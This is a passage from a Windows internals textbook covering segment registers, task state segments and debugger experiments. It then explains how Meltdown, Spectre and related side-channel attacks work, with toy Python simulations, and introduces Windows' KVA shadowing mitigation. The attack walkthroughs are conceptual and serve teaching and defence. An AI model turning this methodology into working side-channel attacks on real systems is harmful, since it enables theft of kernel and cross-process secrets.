gate the values of the segment registers of a thread running user-mode x86 code and find
the following segments:
CS = 1Bh (18h | 3)
ES, DS = 23h (20h | 3)
Yet, during a system call in Ring 0, the following segments would be found:
CS = 08h (08h | 0)
ES, DS = 23h (20h | 3)
Similarly, an x64 thread executing in kernel mode would also have its ES and DS segments set to 2Bh
(28h | 3). This discrepancy is due to a feature known as lazy segment loading, which reflects the meaning-
lessness of the Descriptor Privilege Level (DPL) of a data segment when the current Code Privilege Level
(CPL) is 0. Because higher-privileged code can always
access data of a lower DPL—but not the contrary—setting DS and/or ES to their “proper” values upon
entering the kernel would also require restoring them when returning to user mode.
Reloading segment registers on every transition would add measurable process-
ing costs to system call and interrupt handling. As such, Windows always uses the Ring 3 data segment
values, avoiding these associated costs.
Task state segments
Other than the code and data segment registers, there is an additional special register on both x86 and
x64 architectures: the Task Register (TR), which is also another 16-bit selector that acts as an offset in
the GDT. In this case, however, the segment entry is not associated with code or data, but rather with
a task. This represents the state of the currently executing piece of code, which
is called the Task State—in the case of Windows, the current thread. These task states, represented
by segments (Task State Segment, or TSS), are used in modern x86 operating systems to construct a
variety of tasks that can be associated with critical processor traps (described in the upcoming
section). At minimum, a TSS represents a page directory (through the CR3 register), such as a PML4 on
x64 systems (see Part 1, Chapter 5, “Memory management,” for more information on paging), a Code
Segment, a Stack Segment, an Instruction Pointer, and up to four Stack Pointers (one for each ring
level). Such TSSs are used in the following scenarios:
■ The main TSS, whose selector is loaded in the Task Register (TR). It is
used by the processor to correctly handle interrupts and exceptions by loading the Ring 0 stack
from the TSS if the processor was currently running in Ring 3.
■ A TSS used when handling a debug fault trap, which
requires a dedicated TSS with a custom debug fault handler and kernel stack.
■ A TSS used to load a safe kernel stack when a Double Fault trap
occurs. Similarly, this is used to load the NMI handler on a safe kernel stack.
■ A TSS used when a Machine Check Exception occurs, which, for
the same reasons, can run on a dedicated, safe, kernel stack.
On x64 systems, the ability to have multiple TSSs was removed because the functionality had been
relegated to mostly this one need of executing trap handlers that run on a dedicated kernel stack. As
such, only a single TSS is now used (in the case of Windows, at 040h), which now has an array of eight
possible stack pointers, called the Interrupt Stack Table (IST). Each of the preceding traps is now associ-
ated with an IST Index instead of a custom TSS. In the next section, as we dump a few IDT entries, you
will see the difference between x86 and x64 systems and their handling of these traps.
EXPERIMENT: Viewing the TSSs on an x86 system
On an x86 system, we can look at the system-wide TSS at 28h by using the same dg command
utilized earlier:
kd> dg 28 28
P Si Gr Pr Lo
Sel Base Limit Type l ze an es ng Flags
---- -------- -------- ---------- - -- -- -- -- --------
0028 8116e400 000020ab TSS32 Busy 0 Nb By P Nl 0000008b
The base address of this TSS is 8116e400, so its contents can be dumped with the dx or dt commands:
kd> dx (nt!_KTSS*)0x8116e400
(nt!_KTSS*)0x8116e400
: 0x8116e400 [Type: _KTSS *]
[+0x000] Backlink
: 0x0 [Type: unsigned short]
[+0x002] Reserved0
: 0x0 [Type: unsigned short]
[+0x004] Esp0
: 0x81174000 [Type: unsigned long]
[+0x008] Ss0
: 0x10 [Type: unsigned short]
Note the Esp0 and Ss0 fields, which hold the Ring 0 stack pointer and stack segment that
the processor loads upon a transition to kernel mode. Most other fields are unused because
Windows never uses hardware-based task switching outside of the trap conditions described
earlier. As such, the only use for this particular TSS is to load the appropriate kernel stack during
a hardware interrupt.
On systems that are not vulnerable to the “Meltdown” architectural processor vulnerability, this stack pointer will be the kernel stack of the current thread, whereas on systems that are vulnerable, it will point to the transition stack inside of the Processor Descriptor Area. Additionally, x86 systems use a second TSS, at selector A0h, for the machine-check handler; we can use dg to look at it:
kd> dg a0 a0
P Si Gr Pr Lo
Sel Base Limit Type l ze an es ng Flags
---- -------- -------- ---------- - -- -- -- -- --------
00A0 81170590 00000067 TSS32 Avl 0 Nb By P Nl 00000089
This time, we use the .tss command instead of dx, which will format the various fields of the KTSS structure and display the state as if it were the currently executing task. In this case, the input parameter is the task selector (A0h).
kd> .tss a0
eax=00000000 ebx=00000000 ecx=00000000 edx=00000000 esi=00000000 edi=00000000
eip=81e1a718 esp=820f5470 ebp=00000000 iopl=0 nv up di pl nz na po nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00000000
hal!HalpMcaExceptionHandlerWrapper:
81e1a718 fa cli
Note how the segment registers are set up as described in the “Lazy segment loading” section, and how the instruction pointer points to the machine-check handler wrapper. The .tss output also reflects the task's own Page Directory. In the “Trap dispatching” section, we revisit this TSS when using the !idt command.
EXPERIMENT: Viewing the TSS and the IST on an x64 system
On an x64 system, the dg command unfortunately has a bug that does not correctly show 64-bit
segment base addresses, so obtaining the TSS segment (40h) base address requires dumping
what appear to be two segments, and combining the high, middle, and low base address bytes:
0: kd> dg 40 48
P Si Gr Pr Lo
Sel Base Limit Type l ze an es ng Flags
---- ----------------- ----------------- ---------- - -- -- -- -- --------
0040 00000000`7074d000 00000000`00000067 TSS32 Busy 0 Nb By P Nl 0000008b
0048 00000000`0000ffff 00000000`0000f802 <Reserved> 0 Nb By Np Nl 00000000
Combining the bytes gives a TSS base address of 0xFFFFF8027074D000. To showcase yet another technique, note that the PCR of each processor contains a field called TssBase, which contains a pointer to the TSS as well:
0: kd> dx @$pcr->TssBase
@$pcr->TssBase               : 0xfffff8027074d000 [Type: _KTSS64 *]
    [+0x000] Reserved0       : 0x0 [Type: unsigned long]
    [+0x004] Rsp0            : 0xfffff80270757c90 [Type: unsigned __int64]
The field of interest is Rsp0, which, similarly to Esp0 on x86, contains the address of the
kernel stack for the current thread (on systems without the “Meltdown” hardware vulnerability)
or the address of the transition stack in the Processor Descriptor Area.
On the system on which this experiment was done, a 10th Generation Intel processor was
used; therefore, RSP0 is the current kernel stack:
0: kd> dx @$thread->Tcb.InitialStack
@$thread->Tcb.InitialStack : 0xfffff80270757c90 [Type: void *]
Finally, we can dump the Interrupt Stack Table and see, in the next section, how
the Interrupt Dispatch Table (IDT) references these stacks:
0: kd> dx @$pcr->TssBase->Ist
@$pcr->TssBase->Ist          [Type: unsigned __int64 [8]]
    [0]                      : 0x0 [Type: unsigned __int64]
    [1]                      : 0xfffff80270768000 [Type: unsigned __int64]
    [2]                      : 0xfffff8027076c000 [Type: unsigned __int64]
    [3]                      : 0xfffff8027076a000 [Type: unsigned __int64]
    [4]                      : 0xfffff8027076e000 [Type: unsigned __int64]
Now that the relationship between ring level, code execution, and some of the key segments in the GDT has been established, we will see more about these segments (and their ring levels) in the upcoming section on trap dispatching. Before discussing trap dispatching, however, we first need to describe hardware side-channel vulnerabilities and the Meltdown attack.
Hardware side-channel vulnerabilities
Modern CPUs can compute and move data between their internal registers very quickly (on the order of picoseconds). Far slower are the operations that instruct the CPU to move data from the CPU registers into the main memory and vice versa. There
are different kinds of memory that are accessible from the main CPU. Memory located inside the CPU
package and accessible directly from the CPU execution engine is called cache and has the characteristic of being fast and expensive. Memory that is accessible from the CPU through an external bus is usually the RAM (Random Access Memory) and has the characteristics of being slower, cheaper, and bigger.
To overcome this gap, modern CPUs implement a hierarchical cache system composed of memories of different speeds and sizes (the closer the memory is to the CPU, the faster and smaller it is). Each physical core exposes different levels of fast cache memory, which is directly accessible by the core's execution engine, while the last-level (L3) cache is usually shared between all the cores (in embedded processors, the L3 cache usually does not exist).
[Figure: per-core registers and L1/L2 caches, a shared L3 cache, main memory, and SSD storage; sizes grow and speeds fall at each level, from roughly 2 KB and 250 ps for registers to terabytes and tens of microseconds for an SSD.]
FIGURE 8-2 Caches and storage memory of modern CPUs and their average size and access time.
Accessing a cache takes only a few CPU cycles for L1 and a few dozen for L3 (which is the slowest cache level, though it is still much faster than RAM). Access time to the main memory is instead a hundred times slower. This means
that in case the CPU executes all the instructions in order, many times there would be huge slowdowns
due to instructions accessing data located in the main memory. To overcome this problem, modern
CPUs implement various strategies. Historically, those strategies have led to the discovery of side-chan-
nel attacks (also known as speculative attacks), which have been proven to be very effective against the
overall security of the end-user systems.
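The cost of this hierarchy is often summarized with the classic average memory access time (AMAT) formula. The numbers below are illustrative only, chosen to be consistent with the orders of magnitude shown in Figure 8-2:

```python
def amat(hit_time_ns, miss_rate, miss_penalty_ns):
    # Average memory access time: every access pays the hit time, and a
    # fraction of accesses (miss_rate) additionally pays the miss penalty.
    return hit_time_ns + miss_rate * miss_penalty_ns

# Illustrative values: 1 ns L1 hit time, 5% miss rate, 100 ns to reach RAM.
assert amat(1.0, 0.05, 100.0) == 6.0
```

Even a small miss rate multiplies the effective access time several-fold, which is exactly the slowdown that out-of-order execution tries to hide.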
To correctly describe side-channel hardware attacks and how Windows mitigates them, we should
discuss some basic concepts regarding how the CPU works internally.
Out-of-order execution
A modern microprocessor executes machine instructions thanks to its pipeline. The pipeline contains
many stages, including instruction fetch, decoding, register allocation and renaming, instructions
reordering, execution, and retirement. A common strategy used by the CPUs to bypass the memory
slowdown problem is the capability of their execution engine to execute instructions out of order as
soon as the required resources are available. This means that the CPU does not execute the instructions
in a strictly sequential order, but instead maximizes the utilization of all the execution units of the CPU core as much as possible. A modern processor can execute hundreds of instructions speculatively before
it is certain that those instructions will be needed and committed (retired).
One problem of the described out-of-order execution regards branch instructions. A conditional branch defines two possible paths in the machine code, and which one is correct depends on the previously executed instructions. When calculating the condition depends on previous
instructions that access slow RAM memory, there can be slowdowns. In that case, the execution engine must wait for the resolution of the condition (and thus for the memory bus to complete the memory access) before being able to continue in the out-of-order execution of the following instructions belonging to the correct path. A similar problem happens in the case of indirect branches. In this case, the execution engine of the CPU does not know the target of a branch (usually a jump or a call) because the address must be fetched from the main memory. In this context, the term speculative execution means that the CPU's pipeline decodes and executes multiple instructions in parallel or in an out-of-order way, but the results are not retired into permanent registers, and memory writes remain pending until the branch condition (or indirect target) is finally resolved.
The CPU branch predictor
How does the CPU know which branch (path) should be executed before the branch condition has
been completely evaluated? (The issue is similar with indirect branches, where the target address is
not known). The answer lies in two components located in the CPU package: the branch predictor and
the branch target predictor.
The branch predictor is a complex digital circuit of a CPU that tries to guess which path a branch will go before its condition has been evaluated; the branch target predictor is the analogous part of the CPU that tries to predict the target of indirect branches before it is known. While the actual hardware implementation heavily depends on the CPU manufacturer, the two components both use an internal cache called Branch Target Buffer (BTB), which records the target address of branches (or information about what the conditional branch has previously done in the past) using an address tag generated through an indexing function, similar to how the cache generates the tag, as explained in the next section. The first time a branch is executed, the execution pipeline is stalled, forcing the CPU to wait for the condition or target address to be fetched from the main memory. The second time the same branch is executed, the target address in the BTB is used to fetch the predicted target into the pipeline speculatively. Figure 8-3 shows the scheme of an example branch target predictor.
[Figure: the branch's virtual address (0xFFFFAAAA9F43AA17) is passed through an indexing function F(Addr) that selects a Branch Target Buffer entry (index 12, address tag 9F43AA17, predicted target 0x9F528092).]
FIGURE 8-3 The scheme of a sample CPU branch predictor.
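The mechanism in Figure 8-3 can be modeled with a toy BTB. The indexing function, slot count, and tag derivation below are hypothetical, chosen only to mirror the scheme; real predictors are proprietary and far more elaborate:

```python
# Toy branch target buffer (BTB): a hypothetical indexing function selects a
# slot from the branch's virtual address; a tag disambiguates aliasing branches.
BTB_SLOTS = 256

def btb_index(vaddr):
    return vaddr & (BTB_SLOTS - 1)   # illustrative indexing function F(Addr)

class BranchTargetBuffer:
    def __init__(self):
        self.slots = {}              # slot index -> (tag, predicted target)

    def predict(self, vaddr):
        entry = self.slots.get(btb_index(vaddr))
        if entry and entry[0] == vaddr >> 8:
            return entry[1]          # hit: the pipeline speculates to the target
        return None                  # miss: the pipeline must stall

    def update(self, vaddr, target):
        self.slots[btb_index(vaddr)] = (vaddr >> 8, target)

btb = BranchTargetBuffer()
assert btb.predict(0x9F43AA17) is None        # first execution: no prediction
btb.update(0x9F43AA17, 0x9F528092)            # retirement records the real target
assert btb.predict(0x9F43AA17) == 0x9F528092  # later executions: predicted
```

Note that the BTB is a shared, finite structure indexed only by address bits: this is precisely the property that Spectre Variant 2, described later, abuses to poison predictions across privilege boundaries.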
In case the prediction was wrong, and the wrong path was executed speculatively, the speculatively executed instructions are discarded, the correct path is fed into the CPU pipeline, and the execution restarts from the correct branch. This case is called branch
misprediction. The total number of wasted CPU cycles is not worse than an in-order execution wait-
ing for the result of a branch condition or indirect address evaluation. However, different side effects
of the speculative execution can still happen in the CPU, like the pollution of the CPU cache lines.
Unfortunately, some of these side effects can be measured and exploited by attackers, compromising
the overall security of the system.
The CPU cache(s)
As introduced in the previous section, the CPU cache is a fast memory that reduces the time needed to fetch data from the main memory. Data is transferred between memory and cache in blocks of fixed sizes (usually 64 or 128 bytes) called lines or cache blocks. When a cache line is copied from memory into the cache, a cache entry is created. The cache entry will include the copied data as well as a tag identifying the requested memory location. Unlike the branch target predictor, the cache is always indexed through physical addresses (otherwise, it would be complex to deal with multiple mappings of the same physical page). For cache purposes, the address is split into parts: whereas the higher bits usually represent the tag, the lower bits represent the cache line and the offset into the line. A tag is used to uniquely identify which memory address the cache block belongs to, as shown in Figure 8-4. When the processor reads or writes a location in memory, it first checks the cache (in any cache lines that might contain data from that address; some caches have different ways, as explained later). If the processor finds that the memory location is in the cache, a cache hit has occurred, and the processor immediately reads or writes the data from/in the cache line. Otherwise, a cache miss has occurred. In this case, the CPU allocates a new entry in the cache and copies data from main memory before accessing it.
[Figure: a 48-bit one-way cache with 256 blocks and a 256-byte block size; the physical address 0x019F566030 is split into tag 0x019F56, cache line 0x60, and offset 0x30, and the tag plus data are stored in the selected line.]
FIGURE 8-4 A sample 48-bit one-way CPU cache.
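The address split used by the cache in Figure 8-4 can be verified in a few lines. The constants match the figure (256 blocks of 256 bytes each); the helper name is merely illustrative:

```python
BLOCK_SIZE = 256   # bytes per cache line, as in Figure 8-4
NUM_BLOCKS = 256   # one-way cache with 256 blocks

def split_address(addr):
    # Lowest bits: offset in the line; middle bits: block (line) index;
    # remaining high bits: the tag stored alongside the data.
    offset = addr % BLOCK_SIZE
    block = (addr // BLOCK_SIZE) % NUM_BLOCKS
    tag = addr // (BLOCK_SIZE * NUM_BLOCKS)
    return tag, block, offset

# The address used in Figure 8-4: tag 0x019F56, line 0x60, offset 0x30.
assert split_address(0x019F566030) == (0x019F56, 0x60, 0x30)
```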
Figure 8-4 shows a sample one-way CPU cache indexed by 48-bit addresses. In the sample, the CPU is reading 48 bytes of data located at address 0x019F566030.
In a similar way, when the CPU is instructed to write some new content to a memory address, it first updates the cache line and then may write the data back to the physical RAM as well, depending on the caching type (write-back, write-through, uncached, and so on) applied to the memory page. (Note that this has an important implication in multiprocessor systems: A cache coherency protocol must be designed to prevent situations in which another CPU will operate on stale data after the main CPU has updated a cache block. Multiple CPU cache coherency algorithms exist and are not covered in this book.)
To make room for new entries on cache misses, the CPU sometimes must evict one of the existing cache blocks. The algorithm the cache uses to choose which entry to evict (which means which block will host the new data) is called the placement policy. If the placement policy can replace only one block for a particular address, the cache is called direct mapped (the cache in Figure 8-4 has only one way and is direct mapped). Otherwise, if the cache is free to choose any entry (with the same block number) to hold the new data, the cache is called fully associative. Many caches implement a compromise in which each entry in main memory can go to any one of N places in the cache and are described as N-ways set associative. A way is thus a subdivision of a cache, with each way being of equal size and indexed in the same fashion. Figure 8-5 shows a four-way set associative cache, which can store data belonging to four different physical addresses indexing the same cache block (with different tags) in the four ways of the corresponding cache set.
[Figure: a four-way set associative cache; the index portion of the address selects a set and line across the four ways, the Tag RAM identifies the matching way, and the offset selects the data within the line in the Data RAM.]
FIGURE 8-5 A four-way set associative cache.
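A toy model of an N-way set associative cache with LRU eviction (a sketch, not any real CPU's policy) shows how aliasing addresses share a set without immediately evicting each other:

```python
# Toy N-way set-associative cache: an address maps to exactly one set but may
# occupy any of the N ways within it. LRU eviction is used for illustration.
LINE_SIZE = 64
NUM_SETS = 4
WAYS = 4

def set_index(addr):
    return (addr // LINE_SIZE) % NUM_SETS

class SetAssociativeCache:
    def __init__(self):
        # Each set is an ordered list of tags, least recently used first.
        self.sets = [[] for _ in range(NUM_SETS)]

    def access(self, addr):
        s = self.sets[set_index(addr)]
        tag = addr // (LINE_SIZE * NUM_SETS)
        if tag in s:
            s.remove(tag)
            s.append(tag)      # refresh the LRU position
            return "hit"
        if len(s) == WAYS:
            s.pop(0)           # evict the least recently used way
        s.append(tag)
        return "miss"

c = SetAssociativeCache()
addrs = [i * LINE_SIZE * NUM_SETS for i in range(5)]   # all alias to set 0
assert [c.access(a) for a in addrs] == ["miss"] * 5
assert c.access(addrs[0]) == "miss"   # tag 0 was evicted by the fifth miss
assert c.access(addrs[4]) == "hit"    # tag 4 is still resident
```

Four aliasing addresses coexist in the set; only the fifth forces an eviction, which is the compromise between direct-mapped and fully associative designs described above.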
Side-channel attacks
As discussed in the previous sections, the execution engine of modern CPUs does not write the result of
the computation until the instructions are actually retired. This means that, although multiple instruc-
tions are executed out of order and do not have any visible architectural effects on CPU registers and
memory, they have microarchitectural side effects, especially on the CPU cache. At the end of the year
2017, novel attacks were demonstrated against the CPU out-of-order engines and their branch predic-
tors. These attacks relied on the fact that microarchitectural side effects can be measured, even though
they are not directly accessible by any software code.
The two most destructive and effective hardware side-channel attacks were named Meltdown
and Spectre.
Meltdown
Meltdown (which has been later called Rogue Data Cache load, or RDCL) allowed a malicious user-
mode process to read all memory, even kernel memory, when it was not authorized to do so. The at-
tack exploited the out-of-order execution engine of the processor and an inner race condition between
the memory access and privilege check during a memory access instruction processing.
A typical attack begins with the malicious process flushing the CPU cache (instructions that do so are callable from user mode). The process then executes an illegal kernel memory access and uses the read value to index a large user-mode buffer (the probe array). The process cannot access the kernel memory, so an exception is generated by the processor. The exception is caught by the application. Otherwise, it would result in the termination of the process. However, due to the out-of-order execution, the CPU has already executed (but not retired, meaning that no architectural effects are observable in any CPU registers or RAM) the instructions following the illegal memory access, which have brought the page of the probe array indexed by the secret byte into the cache. The malicious application then probes the entire cache by measuring the time needed to access each page of the array, as shown in Figure 8-6, which is taken from the original Meltdown research paper (available at the https://meltdownattack.com/ website).
[Figure: measured access time, in cycles, for each of the roughly 256 pages of the probe array; most pages take several hundred cycles, while a single page is markedly faster, revealing the cache hit.]
FIGURE 8-6 CPU time employed for accessing a 1 MB probe array.
Because the kernel data can be read one byte at a time and one byte can have only 256 values, knowing the exact page in the array that led to a cache hit allows the attacker to know which byte is stored in the kernel memory.
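The final measurement step reduces to a one-line observation: the probe-array page with the smallest access time reveals the leaked byte. A sketch with synthetic timings (the numbers are invented, roughly matching the figure):

```python
# Recovering the leaked byte from probe-array timings: the one page that was
# speculatively touched is cached, so its access time is far below the rest.
PAGES = 256

def recover_byte(access_times):
    # The index of the fastest page equals the value of the leaked byte.
    return min(range(PAGES), key=lambda i: access_times[i])

# Synthetic measurements: every page costs ~400 cycles except page 0x41.
times = [400] * PAGES
times[0x41] = 60
assert recover_byte(times) == 0x41
```

In a real attack, the timings come from a high-resolution timestamp counter read around each access, and the measurement is repeated to filter out noise.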
Spectre
The Spectre attack relies on the same speculative execution behavior explained in the previous section, but the main CPU components exploited by Spectre are the branch predictor and branch target predictor. Two variants of the Spectre attack were initially presented.
Both are summarized by three phases:
1. In the setup phase, from a low-privileged process (which is attacker-controlled), the attacker performs multiple repetitive operations that mistrain the CPU branch predictor. The goal is to make the CPU mispredict a conditional branch or the target of an indirect branch.

2. In the second phase, the attacker forces a victim high-privileged application (or the same process) to speculatively execute instructions that are part of a mispredicted branch. Those instructions usually transfer secret information into a microarchitectural channel (usually the CPU cache).

3. In the final phase, from the low-privileged process, the attacker recovers the sensitive information stored in the CPU cache (microarchitectural channel) by probing the entire cache (the same methods employed in the Meltdown attack). This reveals secrets that should be secured in the victim high-privileged address space.
The first Spectre variant allows the attacker to read secret data located in the victim address space (which can be the same or different than the address space that the attacker controls), by forcing the CPU branch predictor to execute the wrong branch of a conditional branch speculatively. The branch is usually part of a function that performs a bound check before accessing some nonsecret data contained in a memory buffer. If the buffer is located adjacent to some secret data, and if the attacker controls the offset supplied to the branch condition, she can repetitively train the branch predictor by supplying legal offset values to the function that implements the bound check branch. The CPU branch predictor is thus trained to always follow the initial legit path. The attacker then supplies an out-of-bounds offset; this time, the path would be wrong (the other should be taken). The instructions accessing the memory buffer are thus speculatively executed and result in a read outside the boundaries, which targets the secret data. The attacker can thus read back the secrets by probing the entire cache (similar to the Meltdown attack).
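The mistraining step can be simulated with a toy two-bit saturating predictor guarding the bound check. This is a deliberate simplification (real predictors are far more complex), and all names here are invented for illustration:

```python
# Toy Spectre Variant 1: a two-bit saturating counter guards the bound check,
# and a mispredicted "in bounds" path speculatively reads past the buffer.
class TwoBitPredictor:
    def __init__(self):
        self.state = 0   # 0-1 predict out-of-bounds path, 2-3 predict in-bounds

    def predict_in_bounds(self):
        return self.state >= 2

    def train(self, in_bounds):
        self.state = min(self.state + 1, 3) if in_bounds else max(self.state - 1, 0)

buffer = [10, 20, 30, 40]
secret = [0x41]   # "secret" byte located adjacent to the buffer

def speculative_read(pred, index):
    predicted = pred.predict_in_bounds()
    pred.train(index < len(buffer))      # the real outcome updates the predictor
    if predicted:
        # Speculation follows the prediction even when index is out of bounds;
        # the value read here would leave a measurable trace in the cache.
        return (buffer + secret)[index]
    return None

p = TwoBitPredictor()
for i in range(4):
    speculative_read(p, i)               # mistrain with legal, in-bounds offsets
assert speculative_read(p, 4) == 0x41    # the out-of-bounds secret is touched
```

After four legal accesses the predictor is saturated, so the fifth, out-of-bounds access is speculatively treated as in-bounds, exactly the misprediction that leaks the adjacent secret.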
The second variant of Spectre exploits the CPU branch target predictor; indirect branches can be poisoned by an attacker, and the mispredicted path of an indirect branch can be used to read arbitrary memory of a victim process (or the OS kernel) from an attacker-controlled context. As shown in Figure 8-7, the attacker starts by repetitively executing an indirect branch in her own low-privileged context, causing the CPU to build enough information in the BTB to speculatively execute instructions located at an address chosen by the attacker. In the victim address space, that address should point to a gadget. A gadget is a group of instructions that access a secret and store it in a buffer that is cached in a controlled way (the attacker needs to indirectly control the content of one or more CPU registers in the victim, which is a common case when an API accepts untrusted input data).

The attacker then invokes a service provided by the target higher-privileged entity (a process or the OS kernel). The code that implements the service must implement similar indirect branches as the attacker-controlled process. The CPU branch target predictor in this case speculatively executes the gadget located at the wrong target address. This, as for Variant 1 and Meltdown, creates microarchitectural side effects in the CPU cache, which can be read from the low-privileged context.
[Figure: Spectre Variant 2. In the low-privileged attacker process, SetEvent in kernelbase.dll performs an indirect call through _imp_NtSetEvent, which the attacker points at a gadget in ntdll.dll, training the CPU branch predictor. In the high-privileged victim process, the same indirect call legitimately targets ntdll!NtSetEvent, but the poisoned predictor makes the CPU speculatively execute the gadget (which reads attacker-influenced memory) instead.]
FIGURE 8-7 A scheme of Spectre attack Variant 2.
Other side-channel attacks
After Spectre and Meltdown attacks were originally publicly released, multiple similar side-channel
hardware attacks were discovered. Even though they were less destructive and effective compared to
Meltdown and Spectre, it is important to at least understand the overall methodology of those new
side-channel attacks.
Speculative store bypass (SSB) arises due to a CPU optimization that can allow a load instruction,
which the CPU evaluated not to be dependent on a previous store, to be speculatively executed before
the results of the store are retired. If the prediction is not correct, this can result in the load operation
reading stale data, which can potentially store secrets. The data can be forwarded to other operations
executed during speculation. Those operations can access memory and generate microarchitectural
side effects (usually in the CPU cache). An attacker can thus measure the side effects and recover the
secret value.
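A toy model of the bypass (purely illustrative) shows the difference between correct store-to-load forwarding and the speculative stale read:

```python
# Toy speculative store bypass (SSB): a load is speculatively executed before
# an older store to the same address retires, so it observes the stale value.
def speculative_load(memory, addr, pending_store, bypass):
    store_addr, store_value = pending_store
    if bypass:
        # The CPU guessed the load does not alias the pending store:
        # the stale (potentially secret) value is read from memory.
        return memory[addr]
    # Correct behavior: forward the store's data when the addresses match.
    return store_value if addr == store_addr else memory[addr]

mem = {0x1000: 0x99}                  # 0x99 is the stale value still in memory
assert speculative_load(mem, 0x1000, (0x1000, 0x00), bypass=True) == 0x99
assert speculative_load(mem, 0x1000, (0x1000, 0x00), bypass=False) == 0x00
```

In hardware the misprediction is eventually detected and the load is replayed, but by then the stale value may already have left a trace in the cache.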
The Foreshadow (also known as L1TF) is a more severe attack that was originally designed for stealing secrets from a hardware enclave (SGX) and then generalized also for normal user-mode software, kernel memory, and virtual machines. Foreshadow exploits two problems of the speculative execution engine of modern CPUs. In particular:
■ Speculation on inaccessible virtual memory. In this scenario, when the CPU accesses some data stored at a virtual address described by a page table entry (PTE) that does not include the present bit (meaning that the address is not valid), an exception is correctly generated. However,
if the entry contains a valid address translation, the CPU can speculatively execute the instruc-
tions that depend on the read data. As for all the other side-channel attacks, those instructions
are not retired by the processor, but they produce measurable side effects. In this scenario, a
user-mode application would be able to read secret data stored in kernel memory. More seri-
ously, the application, under certain circumstances, would also be able to read data belonging
to another virtual machine: when the CPU encounters a nonpresent entry in the Second Level
Address Translation table (SLAT) while translating a guest physical address (GPA), the same side
effects can happen. (More information on the SLAT, GPAs, and translation mechanisms are pres-
ent in Chapter 5 of Part 1 and in Chapter 9, “Virtualization technologies”).
■ Speculation on logical processors. Modern CPUs can have more than one execution pipeline per physical core, which can execute in an out-of-order way multiple instruction streams using a single shared execution engine (this is Symmetric multithreading, or SMT, as explained later in Chapter 9.) In those processors, two logical processors (LPs) share a single cache. Thus, while an LP is executing some code in a high-privileged context, the other sibling LP can read the side effects produced by the high-privileged code executed by the other LP. This has very severe effects on the global security posture of a system. Similar to the previous scenario, an attacker could even spoil secrets stored in another high-security virtual machine just by waiting for the victim virtual machine's code to be scheduled on the sibling LP. This kind of Foreshadow attack is part of the Group 4 vulnerabilities.
Microarchitectural side effects are not always targeting the CPU cache. Intel CPUs use other
intermediate high-speed buffers with the goal to better access cached and noncached memory
and reorder micro-instructions. (Describing all those buffers is outside the scope of this book.) The
Microarchitectural Data Sampling (MDS) group of attacks exposes secret data located in the following
microarchitectural structures:
■ Store buffers While performing store operations, processors write data into an internal temporary microarchitectural structure called store buffer, enabling the CPU to continue to execute
instructions before the data is actually written in the cache or main memory (for noncached
memory access). When a load operation reads data from the same memory address as an ear-
lier store, the processor may be able to forward data directly from the store buffer.
■ Fill buffers Fill buffers are internal structures used as an intermediary between the CPU cache and the CPU out-of-order execution engine. They may retain
data from prior memory requests, which may be speculatively forwarded to a load operation.
■ Load ports Load ports are temporary internal CPU structures used to perform load operations from memory or I/O ports.
Microarchitectural buffers usually belong to a single CPU core and are shared between SMT threads.
This implies that, even if attacks on those structures are hard to achieve in a reliable way, the speculative extraction of secret data stored into them is also potentially possible across SMT threads (under specific conditions).
In general, the outcome of all the hardware side-channel vulnerabilities is the same: secrets will be
spoiled from the victim address space. Windows implements various mitigations for protecting against
Spectre, Meltdown, and almost all the described side-channel attacks.
Side-channel mitigations in Windows
This section takes a peek at how Windows implements various mitigations for defending against side-
channel attacks. In general, some side-channel mitigations are implemented by CPU manufacturers
through microcode updates. Not all of them are always available, though; some mitigations need to
be enabled by the software (Windows kernel).
KVA Shadow
KVA shadowing, the Windows implementation of kernel page-table isolation, defeats Meltdown through a strong separation between the kernel and user page tables. Speculative execution allows the CPU to spoil kernel data when the processor is not at the correct privilege level to access it, but it requires that a valid page frame number be present in the page table translating the target kernel page. The kernel memory targeted by the Meltdown attack is generally translated by a valid leaf entry in the system page table, which indicates only supervisor privilege level is allowed. (Page tables and virtual address translation are covered in Chapter 5 of Part 1.) When KVA shadowing is enabled, the system allocates and uses two sets of page tables for each process:
■ The kernel page tables map the entire process address space, including kernel and user pages. In Windows, user pages are mapped as nonexecutable to prevent kernel code from executing memory allocated in user mode (an effect similar to the one brought by the hardware SMEP feature).
■ The user page tables (also called shadow page tables) map only user pages and a minimal set of kernel pages, which do not contain any sort of secrets and are used to provide a minimal functionality for switching page tables, kernel stacks, and to handle interrupts, system calls, and other transitions and traps. This set of kernel pages is called transition address space.
In the transition address space, the NT kernel maps a data structure included in the processor's PRCB that holds the state shared between the two page-table sets, together with the shadow trap handlers. While a thread executes user code, the processor uses the shadow page tables (even when the process runs with Administrator-level privileges), which do not have mapped any kernel page that may contain secrets. The Meltdown attack is not effective anymore; kernel pages are not mapped as valid in the shadow page tables, so no speculative access to their content can happen. When the user process invokes a system call, or when an interrupt happens while the CPU is executing code in the user-mode process, the CPU builds a trap frame on a transition stack, which is mapped in both page-table sets, and executes the code of the shadow trap handler that handles the interrupt or system call. The latter normally switches to the kernel page tables, copies the trap frame on the kernel stack, and then jumps to the original trap handler, which from that point on is executed with the entire address space mapped.
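The effect of the two page-table sets can be captured by a toy model. The names below are made up for illustration; real page tables are multi-level hierarchical structures, not flat sets:

```python
# Illustrative model of the two page-table sets used by KVA shadowing.
kernel_page_tables = {"user_code", "user_data", "kernel_secrets", "transition"}
shadow_page_tables = {"user_code", "user_data", "transition"}

def has_valid_translation(tables, page):
    # A page missing from the active tables has no valid PTE, so even a
    # speculative access has nothing to read: the Meltdown precondition fails.
    return page in tables

assert has_valid_translation(kernel_page_tables, "kernel_secrets")
assert not has_valid_translation(shadow_page_tables, "kernel_secrets")
assert has_valid_translation(shadow_page_tables, "transition")  # traps still work
```

The model makes the mitigation's key property explicit: while user code runs, a kernel secret simply has no translation, which is stronger than relying on the privilege check that Meltdown races against.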
Initialization
The NT kernel determines whether the CPU is susceptible to the Meltdown attack early in phase -1 of its initialization, after the processor feature bits are calculated, using the internal KiDetectKvaLeakage routine, which sets the internal KiKvaLeakage variable to 1 for all Intel processors except Atoms (which are in-order processors).

In case the internal KiKvaLeakage variable is set, KVA shadowing is enabled by the KiEnableKvaShadowing routine, which also prepares the processor's TSS and transition
stacks. Transition stacks (which are 512 bytes in size) are prepared by writing a small data structure that allows each transition stack to be linked against its nontransition kernel stack (accessible only after the page tables have been switched), as shown in Figure 8-8. The linkage is not needed for regular kernel stacks because each thread has a proper kernel stack. The scheduler sets a kernel stack as active by linking it in the processor PRCB when a new thread is selected to be executed. This is a key difference compared to the IST stacks, which exist as one per processor.
